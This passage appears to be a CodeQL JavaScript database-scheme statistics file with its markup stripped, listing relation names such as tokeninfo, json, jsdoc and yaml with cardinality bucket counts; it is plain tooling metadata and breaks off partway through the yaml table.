+2 + + +641 +737 +2 + + +825 +1005 +2 + + +1391 +1403 +2 + + +1465 +1645 +2 + + +2691 +3963 +2 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +3 + + +6 +8 +2 + + +12 +15 +2 + + +17 +19 +2 + + +19 +21 +2 + + +22 +23 +1 + + +23 +24 +2 + + +25 +27 +2 + + +27 +30 +2 + + +42 +49 +2 + + +73 +74 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +6 + + +2 +5 +2 + + +6 +11 +2 + + +13 +28 +2 + + +31 +59 +2 + + +65 +78 +2 + + +100 +118 +2 + + +149 +171 +2 + + +175 +391 +2 + + +433 +791 +2 + + +1992 +1993 +1 + + + + + + +parent +id + + +12 + + +1 +2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +kind + + +12 + + +1 +2 +10080 + + +2 +3 +2026 + + +3 +5 +1068 + + +5 +9 +139 + + + + + + +parent +idx + + +12 + + +1 +2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +tostring + + +12 + + +1 +2 +7733 + + +2 +3 +2644 + + +3 +4 +940 + + +4 +7 +1230 + + +7 +32 +766 + + + + + + +idx +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +kind + + +12 + + +1 +2 +18 + + +2 +3 +15 + + +3 +4 +8 + + +4 +5 +7 + + +5 +8 +6 + + +9 +13 +6 + + +13 +16 +7 + + +17 +20 +7 + + +21 +25 +2 + + + + + + +idx +parent + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +tostring + + +12 + + +1 +2 +8 + + +2 +3 +8 + + +3 +4 +4 + + +5 +7 +6 + + +7 +10 +6 + + +10 +15 +6 + + +16 +21 +7 + + +21 +26 +6 + + +29 +48 +6 + + +48 +75 +6 + + +82 +147 +6 + + +158 +940 +6 + + +3258 +3259 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +3026 + + +2 +3 +751 + + +3 +5 +391 + + +5 +49 +346 + + +49 +1013 +96 + + + + + + +tostring +kind + + +12 + + +1 +2 +4605 + + +2 +3 +5 + + + + + + +tostring +parent + + +12 + + +1 +2 +3041 + + +2 +3 +746 + + +3 +5 +389 + + +5 +53 +346 + + +54 +875 +88 + + + + + + +tostring +idx + + +12 + + +1 +2 +4102 + + +2 +5 +351 + + +5 +58 +157 + + + + + + + + +regexp_parse_errors +id +122 + + +id +122 + + +regexp +41 + + +message +5 + + + + +id +regexp + + +12 + + +1 +2 +122 + + + + + + +id +message + + +12 + + +1 +2 +122 + + + + + + +regexp +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +3 +4 +12 + + +4 +5 +5 + + +5 +6 +7 + + +6 +7 +1 + + + + + + +regexp +message + + +12 + + +1 +2 +18 + + +2 +3 +4 + + +3 +4 +19 + + + + + + +message +id + + +12 + + +1 +2 +1 + + +8 +9 +1 + + +22 +23 +1 + + +23 +24 +1 + + +68 +69 +1 + + + + + + +message +regexp + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +22 +23 +1 + + +23 +24 +1 + + +35 +36 +1 + + + + + + + + +is_greedy +2629 + + +id +2629 + + + + + +isOptionalChaining +100 + + +id +100 + + + + + + +range_quantifier_lower_bound +146 + + +id +146 + + +lo +11 + + + + +id +lo + + +12 + + +1 +2 +146 + + + + + + +lo +id + + +12 + + +1 +2 +4 + + +4 +5 +1 + + +5 +6 +1 + + +17 +18 +1 + + +20 +21 +1 + + +28 +29 +1 + + +33 +34 +1 + + +35 +36 +1 + + + + + + + + +range_quantifier_upper_bound +45 + + +id +45 + + +hi +13 + + + + +id +hi + + +12 + + +1 +2 +45 + + + + + + +hi +id + + +12 + + +1 +2 +5 + + +2 +3 +3 + + +3 +4 +2 + + +8 +9 +1 + + +9 +10 +1 + + +11 +12 +1 + + + + + + + + +is_capture +1280 + + +id +1280 + + +number +14 + + + + +id +number + + +12 + + +1 +2 +1280 + + + + + + +number +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_named_capture +1280 + + +id +1280 + + +name +14 + + + + +id +name + + +12 + + +1 +2 +1280 + + + + + + +name +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_inverted +458 + + +id +458 + + + + + +regexp_const_value +19032 + + +id +19032 + + +value +237 + + + + +id +value + + +12 + + +1 +2 +19032 + + + + + + +value +id + + +12 + + +1 +2 +80 + + +2 +3 +12 + + +3 +4 +10 + + +4 +5 +20 + + +5 +17 +18 + + +17 +30 +18 + + +30 +66 +18 + + +68 +143 +18 + + +155 +242 +18 + + +251 +555 +18 + + +581 +1013 +7 + + + + + + + + +char_class_escape +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapename +1573 + + +id +1573 + + +name +6 + + + + +id +name + + +12 + + +1 +2 +1573 + + + + + + +name +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapevalue +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +backref +11 + + +id +11 + + +value +4 + + + + +id +value + + +12 + + +1 +2 +11 + + + + + + +value +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +named_backref +11 + + +id +11 + + +name +4 + + + + +id +name + + +12 + + +1 +2 +11 + + + + + + +name +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +tokeninfo +id +8770869 + + +id +8770869 + + +kind +9 + + +toplevel +5312 + + +idx +1581031 + + +value +234179 + + + + +id +kind + + +12 + + +1 +2 +8770869 + + + + + + +id +toplevel + + +12 + + +1 +2 +8770869 + + + + + + +id +idx + + +12 + + +1 +2 +8770869 + + + + + + +id +value + + +12 + + +1 +2 +8770869 + + + + + + +kind +id + + +12 + + +2773 +2774 +1 + + +5312 +5313 +1 + + +15526 +15527 +1 + + +31654 +31655 +1 + + +269555 +269556 +1 + + +551767 +551768 +1 + + +557620 +557621 +1 + + +2268328 +2268329 +1 + + +5068334 +5068335 +1 + + + + + + +kind +toplevel + + +12 + + +471 +472 +1 + + +2204 +2205 +1 + + +2851 +2852 +1 + + +3204 +3205 +1 + + +5089 +5090 +1 + + +5219 +5220 +1 + + +5294 +5295 +1 + + +5300 +5301 +1 + + +5312 +5313 +1 + + + + + + +kind +idx + + +12 + + +1949 +1950 +1 + + +2130 +2131 +1 + + +8409 +8410 +1 + + +12883 +12884 +1 + + +51181 +51182 +1 + + +130388 +130389 +1 + + +409369 +409370 +1 + + +583910 +583911 +1 + + +1104589 +1104590 +1 + + + + + + +kind +value + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +34 +35 +1 + + +52 +53 +1 + + +1596 +1597 +1 + + +59827 +59828 +1 + + +85214 +85215 +1 + + +87463 +87464 +1 + + + + + + +toplevel +id + + +12 + + +1 +45 +403 + + +45 +95 +408 + + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +kind + + +12 + + +1 +5 +174 + + +5 +6 +1046 + + +6 +7 +1326 + + +7 +8 +1279 + + +8 +9 +1214 + + +9 +10 +273 + + + + + + +toplevel +idx + + +12 + + +1 +45 +403 + + +45 +95 +408 + + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +value + + +12 + + +1 +21 +423 + + +21 +33 +416 + + +33 +44 +424 + + +44 +55 +400 + + +55 +65 +426 + + +65 +76 +407 + + +76 +88 +426 + + +88 +102 +402 + + +102 +120 +405 + + +120 +144 +401 + + +144 +180 +400 + + +180 +260 +400 + + +260 +46630 +382 + + + + + + +idx +id + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +kind + + +12 + + +1 +2 +1175018 + + +2 +3 +207984 + + +3 +4 +120754 + + +4 +10 +77275 + + + + + + +idx +toplevel + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +value + + +12 + + +1 +2 +1089271 + + +2 +3 +165753 + + +3 +5 +104658 + + +5 +8 +145624 + + +8 +1449 +75725 + + + + + + +value +id + + +12 + + +1 +2 +104636 + + +2 +3 +47235 + + +3 +4 +20077 + + +4 +5 +16835 + + +5 +9 +19608 + + +9 +34 +17687 + + +34 +789848 +8101 + + + + + + +value +kind + + +12 + + +1 +2 +234168 + + +2 +3 +11 + + + + + + +value +toplevel + + +12 + + +1 +2 +174552 + + +2 +3 +34819 + + +3 +8 +18537 + + +8 +5313 +6271 + + + + + + +value +idx + + +12 + + +1 +2 +105969 + + +2 +3 +47057 + + +3 +4 +19986 + + +4 +5 +16682 + + +5 +9 +19402 + + +9 +36 +17686 + + +36 +347359 +7397 + + + + + + + + +next_token +104943 + + +comment +104943 + + +token +74457 + + + + +comment +token + + +12 + + +1 +2 +104943 + + + + + + +token +comment + + +12 + + +1 +2 +59983 + + +2 +3 +8628 + + +3 +12 +5601 + + +12 +141 +245 + + + + + + + + +json +id +1643352 + + +id +1643352 + + +kind +6 + + +parent +617634 + + +idx +159429 + + +tostring +768907 + + + + +id +kind + + +12 + + +1 +2 +1643352 + + + + + + +id +parent + + +12 + + +1 +2 +1643352 + + + + + + +id +idx + + +12 + + +1 +2 +1643352 + + + + + + +id +tostring + + +12 + + +1 +2 +1643352 + + + + + + +kind +id + + +12 + + +24 +25 +1 + + +654 +655 +1 + + +175925 +175926 +1 + + +273113 +273114 +1 + + +441281 +441282 +1 + + +752355 +752356 +1 + + + + + + +kind +parent + + +12 + + +17 +18 +1 + + +411 +412 +1 + + +165183 +165184 +1 + + +167132 +167133 +1 + + +271547 +271548 +1 + + +452264 +452265 +1 + + + + + + +kind +idx + + +12 + + +10 +11 +1 + + +65 +66 +1 + + +152 +153 +1 + + +174 +175 +1 + + +198 +199 +1 + + +159429 +159430 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +2865 +2866 +1 + + +100735 +100736 +1 + + +271467 +271468 +1 + + +393837 +393838 +1 + + + + + + +parent +id + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +kind + + +12 + + +1 +2 +179808 + + +2 +3 +437119 + + +3 +7 +707 + + + + + + +parent +idx + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +tostring + + +12 + + +1 +2 +173483 + + +2 +3 +197229 + + +3 +4 +240036 + + +4 +135127 +6886 + + + + + + +idx +id + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +kind + + +12 + + +1 +2 +159178 + + +2 +7 +251 + + + + + + +idx +parent + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +tostring + + +12 + + +1 +2 +158929 + + +2 +429145 +500 + + + + + + +tostring +id + + +12 + + +1 +2 +511110 + + +2 +3 +165121 + + +3 +6 +69702 + + +6 +63547 +22974 + + + + + + +tostring +kind + + +12 + + +1 +2 +768907 + + + + + + +tostring +parent + + +12 + + +1 +2 +562365 + + +2 +3 +144455 + + +3 +10 +58431 + + +10 +63547 +3656 + + + + + + +tostring +idx + + +12 + + +1 +2 +554379 + + +2 +3 +185366 + + +3 +720 +29162 + + + + + + + + +json_literals +1026146 + + +value +397229 + + +raw +397431 + + +expr +1026146 + + + + +value +raw + + +12 + + +1 +2 +397027 + + +2 +3 +202 + + + + + + +value +expr + + +12 + + +1 +2 +216149 + + +2 +3 +128106 + + +3 +5 +28217 + + +5 +63547 +24757 + + + + + + +raw +value + + +12 + + +1 +2 +397431 + + + + + + +raw +expr + + +12 + + +1 +2 +216237 + + +2 +3 +128277 + + +3 +5 +28205 + + +5 +63547 +24712 + + + + + + +expr +value + + +12 + + +1 +2 +1026146 + + + + + + +expr +raw + + +12 + + +1 +2 +1026146 + + + + + + + + +json_properties +1186648 + + +obj +441238 + + +property +2285 + + +value +1186648 + + + + +obj +property + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +obj +value + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +property +obj + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +property +value + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +value +obj + + +12 + + +1 +2 +1186648 + + + + + + +value +property + + +12 + + +1 +2 +1186648 + + + + + + + + +json_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +json_locations +712 + + +locatable +712 + + +location +712 + + + + +locatable +location + + +12 + + +1 +2 +712 + + + + + + +location +locatable + + +12 + + +1 +2 +712 + + + + + + + + +hasLocation +19213780 + + +locatable +19213780 + + +location +15664049 + + + + +locatable +location + + +12 + + +1 +2 +19213780 + + + + + + +location +locatable + + +12 + + +1 +2 +12144311 + + +2 +3 +3490097 + + +3 +6 +29641 + + + + + + + + +entry_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + + + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +exit_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + + + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +guard_node +177785 + + +id +177785 + + +kind +2 + + +test +91338 + + + + +id +kind + + +12 + + +1 +2 +177785 + + + + + + +id +test + + +12 + + +1 +2 +177785 + + + + + + +kind +id + + +12 + + +86336 +86337 +1 + + +91449 +91450 +1 + + + + + + +kind +test + + +12 + + +82430 +82431 +1 + + +89999 +90000 +1 + + + + + + +test +id + + +12 + + +1 +2 +10245 + + +2 +3 +76994 + + +3 +21 +4099 + + + + + + +test +kind + + +12 + + +1 +2 +10247 + + +2 +3 +81091 + + + + + + + + +successor +6873752 + + +pred +6717415 + + +succ +6718602 + + + + +pred +succ + + +12 + + +1 +2 +6588118 + + +2 +21 +129297 + + + + + + +succ +pred + + +12 + + +1 +2 +6617438 + + +2 +253 +101164 + + + + + + + + +jsdoc +id +19270 + + +id +19270 + + +description +9383 + + +comment +19270 + + + + +id +description + + +12 + + +1 +2 +19270 + + + + + + +id +comment + + +12 + + +1 +2 +19270 + + + + + + +description +id + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +description +comment + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +comment +id + + +12 + + +1 +2 +19270 + + + + + + +comment +description + + +12 + + +1 +2 +19270 + + + + + + + + +jsdoc_tags +id +29323 + + +id +29323 + + +title +92 + + +parent +14226 + + +idx +66 + + +tostring +92 + + + + +id +title + + +12 + + +1 +2 +29323 + + + + + + +id +parent + + +12 + + +1 +2 +29323 + + + + + + +id +idx + + +12 + + +1 +2 +29323 + + + + + + +id +tostring + + +12 + + +1 +2 +29323 + + + + + + +title +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +title +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +title +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + +5 +6 +8 + + +6 +7 +5 + + +7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + +title +tostring + + +12 + + +1 +2 +92 + + + + + + +parent +id + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +title + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +parent +idx + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +tostring + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +title + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +tostring + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +tostring +title + + +12 + + +1 +2 +92 + + + + + + +tostring +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +tostring +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + +5 +6 +8 + + +6 +7 +5 + + +7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + + + +jsdoc_tag_descriptions +13676 + + +tag +13676 + + +text +7866 + + + + +tag +text + + +12 + + +1 +2 +13676 + + + + + + +text +tag + + +12 + + +1 +2 +6089 + + +2 +3 +1025 + + +3 +8 +596 + + +8 +459 +156 + + + + + + + + +jsdoc_tag_names +11506 + + +tag +11506 + + +text +2647 + + + + +tag +text + + +12 + + +1 +2 +11506 + + + + + + +text +tag + + +12 + + +1 +2 +1398 + + +2 +3 +569 + + +3 +4 +201 + + +4 +7 +208 + + +7 +24 +200 + + +24 +498 +71 + + + + + + + + +jsdoc_type_exprs +id +22481 + + +id +22481 + + +kind +15 + + +parent +21039 + + +idx +17 + + +tostring +1447 + + + + +id +kind + + +12 + + +1 +2 +22481 + + + + + + +id +parent + + +12 + + +1 +2 +22481 + + + + + + +id +idx + + +12 + + +1 +2 +22481 + + + + + + +id +tostring + + +12 + + +1 +2 +22481 + + + + + + +kind +id + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +27 +28 +1 + + +35 +36 +1 + + +55 +56 +1 + + +91 +92 +1 + + +287 +288 +1 + + +292 +293 +1 + + +303 +304 +1 + + +310 +311 +1 + + +316 +317 +1 + + +536 +537 +1 + + +668 +669 +1 + + +895 +896 +1 + + +18639 +18640 +1 + + + + + + +kind +parent + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +23 +24 +1 + + +35 +36 +1 + + +55 +56 +1 + + +90 +91 +1 + + +287 +288 +2 + + +301 +302 +1 + + +310 +311 +1 + + +314 +315 +1 + + +524 +525 +1 + + +583 +584 +1 + + +890 +891 +1 + + +17717 +17718 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +5 + + +4 +5 +2 + + +5 +6 +1 + + +13 +14 +1 + + +16 +17 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +5 +6 +1 + + +6 +7 +1 + + +51 +52 +1 + + +57 +58 +1 + + +86 +87 +1 + + +89 +90 +1 + + +104 +105 +1 + + +155 +156 +1 + + +194 +195 +1 + + +696 +697 +1 + + + + + + +parent +id + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +kind + + +12 + + +1 +2 +20644 + + +2 +4 +395 + + + + + + +parent +idx + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +tostring + + +12 + + +1 +2 +19997 + + +2 +7 +1042 + + + + + + +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +kind + + +12 + + +1 +2 +5 + + +2 +3 +7 + + +5 +6 +1 + + +6 +7 +1 + + +10 +11 +1 + + +11 +12 +1 + + +13 +14 +1 + + + + + + +idx +parent + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +tostring + + +12 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 +3 + + +5 +6 +1 + + +6 +7 +1 + + +11 +12 +1 + + +17 +18 +1 + + +21 +22 +1 + + +23 +24 +1 + + +42 +43 +1 + + +103 +104 +1 + + +1378 +1379 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +111 + + +12 +77 +109 + + +77 +2754 +28 + + + + + + +tostring +kind + + +12 + + +1 +2 +1446 + + +2 +3 +1 + + + + + + +tostring +parent + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +112 + + +12 +78 +110 + + +78 +2747 +26 + + + + + + +tostring +idx + + +12 + + +1 +2 +1356 + + +2 +15 +91 + + + + + + + + +jsdoc_record_field_name +241 + + +id +90 + + +idx +15 + + +name +123 + + + + +id +idx + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 +8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +id +name + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 +8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +16 +17 +1 + + +24 +25 +1 + + +43 +44 +1 + + +90 +91 +1 + + + + + + +idx +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +3 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +13 +14 +1 + + +18 +19 +1 + + +29 +30 +1 + + +37 +38 +1 + + + + + + +name +id + + +12 + + +1 +2 +65 + + +2 +3 +40 + + +3 +4 +6 + + +4 +7 +10 + + +9 +25 +2 + + + + + + +name +idx + + +12 + + +1 +2 +87 + + +2 +3 +34 + + +3 +4 +2 + + + + + + + + +jsdoc_prefix_qualifier +823 + + +id +823 + + + + + +jsdoc_has_new_parameter +22 + + +fn +22 + + + + + +jsdoc_errors +id +1658 + + +id +1658 + + +tag +1460 + + +message +203 + + +tostring +89 + + + + +id +tag + + +12 + + +1 +2 +1658 + + + + + + +id +message + + +12 + + +1 +2 +1658 + + + + + + +id +tostring + + +12 + + +1 +2 +1658 + + + + + + +tag +id + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +message + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +tostring + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +message +id + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tag + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tostring + + +12 + + +1 +2 +203 + + + + + + +tostring +id + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +tag + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +message + + +12 + + +1 +2 +66 + + +2 +3 +6 + + +3 +4 +3 + + +4 +7 +7 + + +8 +25 +7 + + + + + + + + +yaml +id +885 + + +id +885 + + +kind +4 + + +parent +204 + + +idx +25 + + +tag +8 + + +tostring +318 + + + + +id +kind + + +12 + + +1 +2 +885 + + + + + + +id +parent + + +12 + + +1 +2 +885 + + + + + + +id +idx + + +12 + + +1 +2 +885 + + + + + + +id +tag + + +12 + + +1 +2 +885 + + + + + + +id +tostring + + +12 + + +1 +2 +885 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +35 +36 +1 + + +149 +150 +1 + + +700 +701 +1 + + + + + + +kind +parent + + +12 + + +1 +2 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +1 + + +7 +8 +1 + + +11 +12 +1 + + +25 +26 +1 + + + + + + +kind +tag + + +12 + + +1 +2 +3 + + +5 +6 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +10 +11 +1 + + +67 +68 +1 + + +240 +241 +1 + + + + + + +parent +id + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +kind + + +12 + + +1 +2 +131 + + +2 +3 +43 + + +3 +4 +30 + + + + + + +parent +idx + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +tag + + +12 + + +1 +2 +120 + + +2 +3 +41 + + +3 +4 +36 + + +4 +5 +7 + + + + + + +parent +tostring + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +5 +6 +5 + + +6 +7 +24 + + +8 +11 +14 + + +12 +14 +16 + + +16 +23 +3 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +14 + + +2 +3 +4 + + +3 +4 +6 + + +4 +5 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +tag + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +3 + + +4 +5 +4 + + +6 +7 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 